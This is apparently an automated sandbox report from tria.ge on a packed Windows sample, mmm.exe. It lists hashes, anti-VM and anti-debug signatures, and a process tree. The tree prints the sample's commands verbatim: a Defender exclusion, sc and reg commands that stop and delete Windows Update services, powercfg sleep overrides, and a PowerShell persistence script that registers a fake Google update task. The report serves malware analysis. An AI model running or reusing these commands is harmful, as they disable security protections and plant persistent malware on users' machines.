Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
29s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
20/10/2022, 00:36
Behavioral task
behavioral1
Sample
mmm.exe
Resource
win7-20220901-en
General
-
Target
mmm.exe
-
Size
6.9MB
-
MD5
c2b5692d7461c63215d8d13031094e1a
-
SHA1
383c835bbc904152fedb7910d2028d518278d578
-
SHA256
85569470b1bacc8146eb41de3e46cefd826a13cac3f97e5a5ca65ec14be5ec5c
-
SHA512
b89eeff2ecec12d3243266fce3ee2dd1c766e4bbbad6067d453b65d276b6d7ef2f18116703b4546399f7430ffe49c83e526d216c4b842c3c69bd4bf0f052c14f
-
SSDEEP
196608:MrAev3AuJzPokWeb+loYC4uzHD/N6arTdeS/4mzlWc6L:SlBPoeeSbN6and3/4cH6L
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mmm.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts mmm.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mmm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mmm.exe -
resource yara_rule behavioral1/memory/1900-54-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-55-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-57-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-58-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-59-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-60-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-61-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-62-0x000000013F4F0000-0x0000000140189000-memory.dmp themida behavioral1/memory/1900-102-0x000000013F4F0000-0x0000000140189000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mmm.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1900 mmm.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe mmm.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1708 sc.exe 1816 sc.exe 1456 sc.exe 1444 sc.exe 856 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1784 powershell.exe 1532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1784 powershell.exe Token: SeShutdownPrivilege 1548 powercfg.exe Token: SeShutdownPrivilege 2036 powercfg.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeShutdownPrivilege 1980 powercfg.exe Token: SeShutdownPrivilege 1964 powercfg.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1900 wrote to memory of 1784 1900 mmm.exe 27 PID 1900 wrote to memory of 1784 1900 mmm.exe 27 PID 1900 wrote to memory of 1784 1900 mmm.exe 27 PID 1900 wrote to memory of 796 1900 mmm.exe 29 PID 1900 wrote to memory of 796 1900 mmm.exe 29 PID 1900 wrote to memory of 796 1900 mmm.exe 29 PID 1900 wrote to memory of 1696 1900 mmm.exe 30 PID 1900 wrote to memory of 1696 1900 mmm.exe 30 PID 1900 wrote to memory of 1696 1900 mmm.exe 30 PID 1900 wrote to memory of 1532 1900 mmm.exe 32 PID 1900 wrote to memory of 1532 1900 mmm.exe 32 PID 1900 wrote to memory of 1532 1900 mmm.exe 32 PID 796 wrote to memory of 1816 796 cmd.exe 35 PID 796 wrote to memory of 1816 796 cmd.exe 35 PID 796 wrote to memory of 1816 796 cmd.exe 35 PID 1696 wrote to memory of 1548 1696 cmd.exe 36 PID 1696 wrote to memory of 1548 1696 cmd.exe 36 PID 1696 wrote to memory of 1548 1696 cmd.exe 36 PID 796 wrote to memory of 1456 796 cmd.exe 37 PID 796 wrote to memory of 1456 796 cmd.exe 37 PID 796 wrote to memory of 1456 796 cmd.exe 37 PID 796 wrote to memory of 1444 796 cmd.exe 38 PID 796 wrote to memory of 1444 796 cmd.exe 38 PID 796 wrote to memory of 1444 796 cmd.exe 38 PID 1696 wrote to memory of 2036 1696 cmd.exe 39 PID 1696 wrote to memory of 2036 1696 cmd.exe 39 PID 1696 wrote to memory of 2036 1696 cmd.exe 39 PID 796 wrote to memory of 856 796 cmd.exe 40 PID 796 wrote to memory of 856 796 cmd.exe 40 PID 796 wrote to memory of 856 796 cmd.exe 40 PID 1696 wrote to memory of 1980 1696 cmd.exe 41 PID 1696 wrote to memory of 1980 1696 cmd.exe 41 PID 1696 wrote to memory of 1980 1696 cmd.exe 41 PID 796 wrote to memory of 1708 796 cmd.exe 42 PID 796 wrote to memory of 1708 796 cmd.exe 42 PID 796 wrote to memory of 1708 796 cmd.exe 42 PID 1696 wrote to memory of 1964 1696 cmd.exe 43 PID 1696 wrote to memory of 1964 1696 cmd.exe 43 PID 1696 wrote to memory of 1964 1696 cmd.exe 43 PID 796 wrote to memory of 1988 796 cmd.exe 44 PID 796 wrote to memory of 1988 796 cmd.exe 44 PID 796 wrote to memory of 1988 796 cmd.exe 44 PID 1532 wrote to memory of 2004 1532 powershell.exe 46 PID 1532 wrote to memory of 2004 1532 powershell.exe 46 PID 1532 wrote to memory of 2004 1532 powershell.exe 46 PID 796 wrote to memory of 1184 796 cmd.exe 45 PID 796 wrote to memory of 1184 796 cmd.exe 45 PID 796 wrote to memory of 1184 796 cmd.exe 45 PID 796 wrote to memory of 1528 796 cmd.exe 47 PID 796 wrote to memory of 1528 796 cmd.exe 47 PID 796 wrote to memory of 1528 796 cmd.exe 47 PID 796 wrote to memory of 832 796 cmd.exe 48 PID 796 wrote to memory of 832 796 cmd.exe 48 PID 796 wrote to memory of 832 796 cmd.exe 48 PID 796 wrote to memory of 1524 796 cmd.exe 49 PID 796 wrote to memory of 1524 796 cmd.exe 49 PID 796 wrote to memory of 1524 796 cmd.exe 49 PID 1900 wrote to memory of 1656 1900 mmm.exe 50 PID 1900 wrote to memory of 1656 1900 mmm.exe 50 PID 1900 wrote to memory of 1656 1900 mmm.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\mmm.exe"C:\Users\Admin\AppData\Local\Temp\mmm.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1444
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1988
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1184
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1528
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:832
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1524
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2004
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:1656
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1592
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D67763A8-D20C-4CA6-A9ED-80B9C1BD9889} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1704
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afef8d0a33d2b54795d2d0571dea98a3
SHA180ba0e3ab59b2b04c5ed38e0c1f865f2b597d526
SHA25607a34915211cf6b7a56a934087576b96a2972fa2567a340ffaaa6812328ad392
SHA512c3cfa9b42a2cb80f10b94dedd7a843214829d0a1d0dd937765bc89faabf12391ef0412c6605c5c4c97223e6cddabead991b0d8167af7fddfbf8ee06c1ce83e21
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afef8d0a33d2b54795d2d0571dea98a3
SHA180ba0e3ab59b2b04c5ed38e0c1f865f2b597d526
SHA25607a34915211cf6b7a56a934087576b96a2972fa2567a340ffaaa6812328ad392
SHA512c3cfa9b42a2cb80f10b94dedd7a843214829d0a1d0dd937765bc89faabf12391ef0412c6605c5c4c97223e6cddabead991b0d8167af7fddfbf8ee06c1ce83e21